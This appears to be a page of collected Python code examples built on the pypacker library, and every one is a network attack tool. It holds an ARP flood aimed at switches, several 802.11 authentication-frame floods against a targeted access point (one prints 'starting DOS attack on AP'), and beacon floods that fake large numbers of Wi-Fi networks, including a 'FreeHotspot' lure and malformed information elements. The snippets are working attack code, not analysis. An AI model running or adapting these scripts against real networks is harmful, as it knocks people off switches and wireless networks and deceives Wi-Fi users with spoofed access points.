예제 #1
0
def arp_cb(pargs):
    """ARP DoS, eg for switches"""
    #logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
    pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
     arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
      op=arp.ARP_OP_REQUEST)
    pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
     arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
      op=arp.ARP_OP_REPLY)

    psock = psocket.SocketHndl(iface_name=pargs.iface_name)

    for cnt in range(pargs.count):
        # request from various sources
        mac = pypacker.get_rnd_mac()
        pkt_arp_req.src = mac
        pkt_arp_req.arp.sha = mac
        pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
        psock.send(pkt_arp_req.bin())

        # response from various sources
        mac = pypacker.get_rnd_mac()
        pkt_arp_resp.src = mac
        pkt_arp_resp.arp.sha = mac
        pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
        psock.send(pkt_arp_resp.bin())
    psock.close()
예제 #2
0
def wifi_authdos_cb(pargs):
    """
	Authentication frames DoS
	"""
    radiotap_ieee80211 = radiotap.Radiotap() + \
     ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
    auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
    radiotap_ieee80211_auth = radiotap_ieee80211 + auth
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)

    channel = int(pargs.channels.split(",")[0])
    logger.debug("sending %d deauth to %r on channel %d", pargs.count,
                 pargs.mac_dst, channel)
    utils.switch_wlan_channel(pargs.iface_name,
                              int(pargs.channels.split(",")[0]))

    for cnt in range(pargs.count):
        if cnt & 15 == 0:
            print(".", end="")
            sys.stdout.flush()
        auth.src = pypacker.get_rnd_mac()

        try:
            psock_send.send(radiotap_ieee80211_auth.bin())
        except socket.timeout:
            # timeout on sending? that's ok
            pass
    print("")
    psock_send.close()
예제 #3
0
def send_auth(mac):
	"""Send authentications to ap having mac 'mac'"""
	auth_req = copy.deepcopy(auth_req_orig)
	start_time = time.time()

	for i in range(1000000):
		if i % 500 == 0:
			diff = time.time() - start_time
			print("%d pps" % (i / diff))
		auth_req[ieee80211.IEEE80211.Auth].src = pypacker.get_rnd_mac()

		try:
			psocket.send(auth_req.bin())
		except socket.timeout:
			# timeout on sending? that's ok
			pass
예제 #4
0
def send_beacon(_):
	"""Send beacon having mac 'mac'"""
	beacon = copy.deepcopy(beacon_orig)
	start_time = time.time()
	aps_per_channel = 5
	current_channel = 1

	for i in range(1, 10000):
		if i % 100 == 0:
			diff = time.time() - start_time
			print("%d pps" % (i / diff))
		if i % aps_per_channel == 0:
			current_channel += 1
			current_channel %= 13
			if current_channel == 0:
				current_channel = 1
			# utils.switch_wlan_channel(wlan_monitor_if, current_channel)

		_beacon = beacon[ieee80211.IEEE80211.Beacon]
		mac = pypacker.get_rnd_mac()
		_beacon.src = mac
		_beacon.bssid = mac
		# set new ssid
		_beacon.params[0].body_bytes = bytes("".join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)), "ascii")
		# print(_beacon.params[0].body_bytes)
		_beacon.seq = 0

		# print(_beacon)

		try:
			for x in range(100):
				# send multiple beacons for every ap
				psocket.send(beacon.bin())
				_beacon.seq = x
				# _beacon.ts = x << (8*7)
				_beacon.ts = x
		except socket.timeout:
			# timeout on sending? that's ok
			pass
예제 #5
0
import time

# name of monitor interface to use
wlan_monitor_if	= "prism0"
# MAC address of access point
ap_mac		= "00:11:22:33:44:55"
mon_sock	= psocket.SocketHndl(wlan_monitor_if)

auth_req	= prism(len=24) +\
		ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=1, from_ds=0) +\
		ieee80211.IEEE80211.MGMTFrame(dst_s=ap_mac, bssid_s=ap_mac) +\
		ieee80211.IEEE80211.Auth(auth_seq=1)

print("starting DOS attack on AP %s" % ap_mac)

for i in range(10000):
	#drvinfo = radiotap.Radiotap(raw_bytes)
	drvinfo = prism.Prism(raw_bytes)
	start_time = time.time()

	if i % 100 == 0:
		diff = time.time()-start_time
		print("%d pps" % (100/diff) )

	try:
		auth_req[ieee80211.IEEE80211.MGMTFrame].src = pypacker.get_rnd_mac()
		psocket.send(auth_req.bin())
	except Exception as e:
		mon_sock.close()
		print(e)
예제 #6
0
def wifi_ap_ie_cb(pargs):
    """
	Create fake APs using various IEs
	"""
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
         ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
        ]
        )
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "012"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # adaptive sleeptime due to full buffer on fast sending
    sleeptime = 0.000001
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)

    ie_cnt = 0
    pkt_cnt = 0
    PACKETS_PER_CHANNEL = 3

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        for channel in channels:
            if pkt_cnt % (256) == 0:
                print("%d packets sent, ch: %d      \r" % (pkt_cnt, channel),
                      end="")
                sys.stdout.flush()

            _beacon.params[2].body_bytes = pack_B(channel)
            utils.switch_wlan_channel(pargs.iface_name, channel)
            #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
            pkt_cnt += 256

            try:
                for ie_id in range(256):
                    _beacon.params[5].id = ie_id
                    mac = pypacker.get_rnd_mac()
                    _beacon.src = mac
                    _beacon.bssid = mac
                    _beacon.params[0].body_bytes = get_random_essid()
                    _beacon.params[0].len = len(_beacon.params[0].body_bytes)

                    for _ in range(PACKETS_PER_CHANNEL):
                        _beacon.seq = ie_id
                        # _beacon.ts = x << (8*7)
                        _beacon.ts = ie_id * 20
                        # time.sleep(0.01)
                        psock_send.send(beacon.bin())
                        time.sleep(sleeptime)
            except socket.timeout:
                # timeout on sending? that's ok
                pass
            except OSError:
                sleeptime *= 10
                print()
                logger.warning(
                    "buffer full, new sleeptime: %03.6fs, waiting...",
                    sleeptime)
                time.sleep(1)

            ie_cnt = (ie_cnt + 1) & 0xFF
    psock_send.close()
예제 #7
0
def wifi_ap_cb(pargs):
    """
	Create a massive amount of fake APs
	"""
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "FreeHotspot"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    _beacon.interval = 0xFFFF
    # adaptive sleeptime due to full buffer on fast sending
    sleeptime = 0.000001
    rand_mac = True
    rand_essid = True
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)
    cnt = 0
    rounds = 0
    PACKETS_PER_CHANNEL = 3
    starttime = time.time()
    _beacon.params[2].body_bytes = pack_B(channels[0])
    utils.switch_wlan_channel(pargs.iface_name, channels[0])

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        if cnt & 0xF == 0:
            print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
            sys.stdout.flush()

            if time.time() - starttime > 60:
                rounds += 1
                cnt = 0

        cnt_bts = unpack_I(cnt)[0][-3:]
        cnt += 1

        if rand_mac:
            mac = pypacker.get_rnd_mac()[:3] + cnt_bts
            _beacon.src = mac
            _beacon.bssid = mac

        if rand_essid:
            _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
            _beacon.params[0].len = len(_beacon.params[0].body_bytes)

        try:
            _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
            _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL

            for cnt_ap in range(PACKETS_PER_CHANNEL):
                # send multiple beacons for every ap
                psock_send.send(beacon.bin())
                _beacon.seq += 1
                _beacon.ts += 0x100
                #time.sleep(sleeptime)
        except socket.timeout:
            # timeout on sending? that's ok
            pass
        except OSError:
            sleeptime *= 10
            print()
            logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
                           sleeptime)
            time.sleep(1)

    psock_send.close()